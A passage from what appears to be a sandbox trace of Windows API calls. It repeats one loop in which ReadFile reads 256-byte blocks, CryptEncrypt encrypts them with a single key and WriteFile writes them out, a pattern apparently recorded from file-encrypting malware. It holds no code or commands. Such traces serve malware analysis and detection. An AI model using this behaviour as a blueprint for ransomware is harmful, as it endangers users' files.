pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.164] GetLastError () returned 0x0 [0170.164] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.164] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.164] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.164] GetLastError () returned 0x0 [0170.164] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.164] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.164] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.164] GetLastError () returned 0x0 [0170.164] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.165] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.165] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.165] GetLastError () returned 0x0 [0170.165] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.165] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.165] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.165] GetLastError () returned 0x0 [0170.165] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.165] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.165] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.165] GetLastError () returned 0x0 [0170.165] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.165] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.165] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.165] GetLastError () returned 0x0 [0170.165] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.166] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.166] GetLastError () returned 0x0 [0170.166] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.166] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.166] GetLastError () returned 0x0 [0170.166] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.166] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.166] GetLastError () returned 0x0 [0170.166] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.166] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.166] GetLastError () returned 0x0 [0170.166] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.167] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.167] GetLastError () returned 0x0 [0170.167] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.167] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.167] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.167] GetLastError () returned 0x0 [0170.167] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.167] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.167] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.167] GetLastError () returned 0x0 [0170.167] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.167] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.167] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.167] GetLastError () returned 0x0 [0170.167] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.167] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.167] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.167] GetLastError () returned 0x0 [0170.167] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.167] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.168] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.168] GetLastError () returned 0x0 [0170.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.168] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.168] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.168] GetLastError () returned 0x0 [0170.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.168] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.168] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.168] GetLastError () returned 0x0 [0170.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.168] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.168] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.168] GetLastError () returned 0x0 [0170.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.168] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.168] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.168] GetLastError () returned 0x0 [0170.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.169] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.169] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.169] GetLastError () returned 0x0 [0170.169] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.169] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.169] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.169] GetLastError () returned 0x0 [0170.169] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.169] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.169] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.169] GetLastError () returned 0x0 [0170.169] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.169] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.169] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.169] GetLastError () returned 0x0 [0170.169] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.169] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.170] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.170] GetLastError () returned 0x0 [0170.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.170] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, 